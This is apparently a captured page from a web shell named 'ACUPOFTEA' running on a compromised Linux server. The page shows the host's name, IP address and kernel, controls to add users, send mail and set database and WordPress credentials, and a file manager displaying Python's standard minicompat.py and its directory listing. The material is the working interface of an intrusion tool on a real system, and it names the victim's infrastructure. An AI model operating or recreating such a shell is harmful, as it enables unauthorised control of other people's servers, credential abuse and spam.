System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
xml
/
dom
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
minicompat.py
"""Python version compatibility support for minidom.""" # This module should only be imported using "import *". # # The following names are defined: # # NodeList -- lightest possible NodeList implementation # # EmptyNodeList -- lightest possible NodeList that is guaranteed to # remain empty (immutable) # # StringTypes -- tuple of defined string types # # defproperty -- function used in conjunction with GetattrMagic; # using these together is needed to make them work # as efficiently as possible in both Python 2.2+ # and older versions. For example: # # class MyClass(GetattrMagic): # def _get_myattr(self): # return something # # defproperty(MyClass, "myattr", # "return some value") # # For Python 2.2 and newer, this will construct a # property object on the class, which avoids # needing to override __getattr__(). It will only # work for read-only attributes. # # For older versions of Python, inheriting from # GetattrMagic will use the traditional # __getattr__() hackery to achieve the same effect, # but less efficiently. # # defproperty() should be used for each version of # the relevant _get_<property>() function. __all__ = ["NodeList", "EmptyNodeList", "StringTypes", "defproperty"] import xml.dom try: unicode except NameError: StringTypes = type(''), else: StringTypes = type(''), type(unicode('')) class NodeList(list): __slots__ = () def item(self, index): if 0 <= index < len(self): return self[index] def _get_length(self): return len(self) def _set_length(self, value): raise xml.dom.NoModificationAllowedErr( "attempt to modify read-only attribute 'length'") length = property(_get_length, _set_length, doc="The number of nodes in the NodeList.") # For backward compatibility def __setstate__(self, state): if state is None: state = [] self[:] = state class EmptyNodeList(tuple): __slots__ = () def __add__(self, other): NL = NodeList() NL.extend(other) return NL def __radd__(self, other): NL = NodeList() NL.extend(other) return NL def item(self, index): return None def _get_length(self): return 0 def _set_length(self, value): raise xml.dom.NoModificationAllowedErr( "attempt to modify read-only attribute 'length'") length = property(_get_length, _set_length, doc="The number of nodes in the NodeList.") def defproperty(klass, name, doc): get = getattr(klass, ("_get_" + name)).im_func def set(self, value, name=name): raise xml.dom.NoModificationAllowedErr( "attempt to modify read-only attribute " + repr(name)) assert not hasattr(klass, "_set_" + name), \ "expected not to find _set_" + name prop = property(get, set, doc=doc) setattr(klass, name, prop)
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
..
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
NodeFilter.py
text/x-python
937 B
-rw-r--r--
2024-04-10 04:58:35
NodeFilter.pyc
application/octet-stream
1.1 KB
-rw-r--r--
2024-04-10 04:58:46
NodeFilter.pyo
application/octet-stream
1.1 KB
-rw-r--r--
2024-04-10 04:58:46
__init__.py
text/x-python
3.9 KB
-rw-r--r--
2024-04-10 04:58:35
__init__.pyc
application/octet-stream
6.33 KB
-rw-r--r--
2024-04-10 04:58:46
__init__.pyo
application/octet-stream
6.33 KB
-rw-r--r--
2024-04-10 04:58:46
domreg.py
text/x-python
3.44 KB
-rw-r--r--
2024-04-10 04:58:35
domreg.pyc
application/octet-stream
3.3 KB
-rw-r--r--
2024-04-10 04:58:46
domreg.pyo
application/octet-stream
3.3 KB
-rw-r--r--
2024-04-10 04:58:46
expatbuilder.py
text/x-python
35.53 KB
-rw-r--r--
2024-04-10 04:58:35
expatbuilder.pyc
application/octet-stream
32.22 KB
-rw-r--r--
2024-04-10 04:58:46
expatbuilder.pyo
application/octet-stream
31.61 KB
-rw-r--r--
2024-04-10 04:58:44
minicompat.py
text/plain
3.28 KB
-rw-r--r--
2024-04-10 04:58:35
minicompat.pyc
application/octet-stream
3.35 KB
-rw-r--r--
2024-04-10 04:58:46
minicompat.pyo
application/octet-stream
3.24 KB
-rw-r--r--
2024-04-10 04:58:44
minidom.py
text/x-python
64.72 KB
-rw-r--r--
2024-04-10 04:58:35
minidom.pyc
application/octet-stream
64.07 KB
-rw-r--r--
2024-04-10 04:58:46
minidom.pyo
application/octet-stream
63.94 KB
-rw-r--r--
2024-04-10 04:58:44
pulldom.py
text/x-python
11.69 KB
-rw-r--r--
2024-04-10 04:58:35
pulldom.pyc
application/octet-stream
12.77 KB
-rw-r--r--
2024-04-10 04:58:46
pulldom.pyo
application/octet-stream
12.77 KB
-rw-r--r--
2024-04-10 04:58:46
xmlbuilder.py
text/x-python
12.05 KB
-rw-r--r--
2024-04-10 04:58:35
xmlbuilder.pyc
application/octet-stream
14.98 KB
-rw-r--r--
2024-04-10 04:58:46
xmlbuilder.pyo
application/octet-stream
14.94 KB
-rw-r--r--
2024-04-10 04:58:44
~ ACUPOFTEA - mail.ontime-ae.com